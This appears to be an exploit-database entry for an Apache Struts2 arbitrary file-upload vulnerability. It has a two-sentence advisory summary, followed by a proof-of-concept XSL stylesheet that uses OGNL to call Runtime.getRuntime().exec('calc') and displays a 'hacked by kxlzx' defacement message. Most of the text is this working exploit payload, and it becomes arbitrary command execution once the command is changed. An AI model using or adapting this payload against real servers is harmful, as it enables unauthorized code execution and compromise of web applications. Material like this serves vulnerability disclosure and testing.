source: https://www.securityfocus.com/bid/52702/info
ApacheStruts2 is prone toa remote arbitrary file-upload vulnerability because it fails tosufficiently sanitize user-supplied input.
Attackers can exploit this issue toupload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.<?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl"><xsl:template match="/"><html><body><h2>hacked by kxlzx</h2><h2>http://www.example.com</h2><exp><xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/></exp></body></html></xsl:template></xsl:stylesheet>